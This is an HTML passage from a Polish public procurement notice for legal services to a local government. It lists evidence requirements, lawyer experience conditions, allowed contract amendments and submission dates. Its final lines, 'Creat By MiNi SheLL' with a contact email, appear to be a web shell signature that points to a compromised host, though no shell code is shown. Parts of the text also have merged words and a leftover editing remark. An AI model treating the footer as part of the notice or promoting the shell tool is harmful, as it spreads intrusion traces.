<h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie będzie<br/>żądał od wykonawcy, przedstawienia podmiotowych środków dowodowych, w<br/>zakresie podstaw wykluczenia z postępowania dot. art. 108 ust. 1 oraz art. 109 ust. 1 pkt 1) i 4) ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Formularz ofertowy <br/>2.	Warunek określony <br/>w Rozdziale XVII.1.	Podpisane przez Wykonawcę Oświadczenie o spełnieniu warunków udziału w postępowaniu <br/> <br/>3.	Warunek, że Wykonawca posiada wiedzę i doświadczenie.<br/>	Za spełnienie powyższego warunku Zamawiający uzna wykazanie wykonanych (a w przypadku świadczeń okresowych lub ciągłych również wykonywanych) usług w zakresie kompleksowej i stałej obsługi prawnej jednostki samorządu terytorialnego oraz reprezentacji prawnej jednostki samorządu terytorialnego, w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeśli okres prowadzenia działalności jest krótszy <br/>– w tym okresie). W tym celu Wykonawca musi wykazać, zgodnie z opisem w Rozdz. XVII ust. 1 pkt.1.2. lit.b)<br/>z podaniem ich rodzaju i wartości, daty wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów potwierdzających, że usługi zostały wykonane lub są wykonywane należycie. <br/><br/>4.	Warunek, że Wykonawca<br/>dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.<br/>Za spełnienie powyższego warunku Zamawiający uzna dysponowanie <br/>co najmniej 3 osobami uprawnionymi <br/>do świadczenia pomocy prawnej, posiadającymi aktualny wpis na listę radców prawnych/adwokatów i spełniającymi wskazane kryteria w Rozdz. XVII ust. 1 pkt.1.2. lit.c)<br/><br/>Osoby zdolne do wykonania zamówienia muszą posiadać min. doświadczenie :1.	osoba świadcząca obsługę prawną: koordynator – radca prawny/adwokat posiadający co najmniej 5 letnie doświadczenie zawodowe (liczone <br/>od daty wpisu na listę radców prawnych/ adwokatów), a także <br/>co najmniej 3 letnie doświadczenie <br/>w kompleksowej i stałej obsłudze prawnej jednostki samorządu terytorialnego (w tym w formie dyżurów w siedzibie Zamawiającego w wymiarze nie mniejszym niż średnio jeden dzień w tygodniu w zakreślonym okresie minimalnego doświadczenia) obejmującej wszystkie spośród dziedzin wskazanych w Rozdziale V pkt 1 ppkt 1.3 lit. b ppkt 1) oraz posiadający doświadczenie wynikające z realizacji na rzecz jednostki samorządu terytorialnego co najmniej trzech spośród usług wskazanych w Rozdziale V pkt 1 ppkt 1.3 lit. b</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 10.	Do oferty (Formularz Ofertowy) Wykonawca załącza:<br/>10.1	Oświadczenie Wykonawcy o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu (Załącznik nr 2a oraz Załącznik nr 2a’ (dotyczy wspólników spółek cywilnych)) w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu składa każdy z Wykonawców;<br/>10.2	Oświadczenie dot. przesłanek wykluczenia w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Załącznik nr 2c) <br/>10.3	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany w treści zawartej umowy oprócz przypadków określonych w art. 455 ust. 1i 2 Pzp mogą nastąpić w przypadku: <br/>1) zmiana terminu realizacji usługi z przyczynnie leżących po stronie Wykonawcy, w przypadku: <br/>a) pisemnego uzgodnienia pomiędzy Stronami dotyczącegoskróceniu terminu zakończenia realizacji zamówienia - tobym wykreśłiła <br/>b) gdy warunki usługi zostaną zmienione przezzmianę przepisów i normatywów, <br/>c) działania siły wyższej (np. klęski żywiołowe,strajki generalne lub lokalne), mające bezpośredni wpływ naterminowość wykonania usług, <br/>2) zmiana nazwy, siedziby stron umowy, numerówkont bankowych, osób do kontaktów pomiędzy stronami umowyoraz innychdanych identyfikacyjnych; <br/>3) zmniejszenie zakresu wynagrodzenia z przyczyno obiektywnym charakterze, istotnej zmiany okolicznościpowodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć wchwili jejzawarcia zaś zmiana nie może przekroczyć 10% ichwartości określonejw § 3 ust. 1 umowy; <br/>4) zmiana wysokości kwot ujętych w poszczególnych latach budżetowych realizacji zamówienia z uwagi naprzesunięcia finansowei korekty budżetu Zamawiającego w przypadku zaistnienie przesłanek usatwtwych lub umownych dla zmiany wynagrodzenia, jak również w przypadku szybszego wyczerpania środków lub jego opóźnienia z wyjątkiem maksymalnej kwoty zobowiązania umownego. <br/>5) wystąpienie oczywistych omyłek pisarskichi rachunkowych w treści umowy; <br/>6) w przypadku zmian: <br/>· stawki podatku od towarów i usług oraz podatku akcyzowego, <br/>· wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę, <br/>· zasadpodlegania ubezpieczeniom społecznym lub ubezpieczeniuzdrowotnemu lubwysokości stawki składki na ubezpieczenia społeczne lububezpieczeniezdrowotne, <br/>· zasadgromadzenia i wysokości wpłat do pracowniczych planówkapitałowych, <br/>o których mowa w ustawie z dnia 4 października 2018 r. opracowniczychplanach kapitałowych (Dz. U. poz. 2215 oraz z 2019 r. poz.1074 i 1572) <br/>- jeżelizmiany te będą miały wpływ na koszty wykonania zamówieniaprzez wykonawcę. <br/>a) W sytuacji wystąpienia okoliczności wskazanychw ust. 2 pkt 7) tiret 1 (szczegółowy i dalszy opis w umowie) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ugk.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-05 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com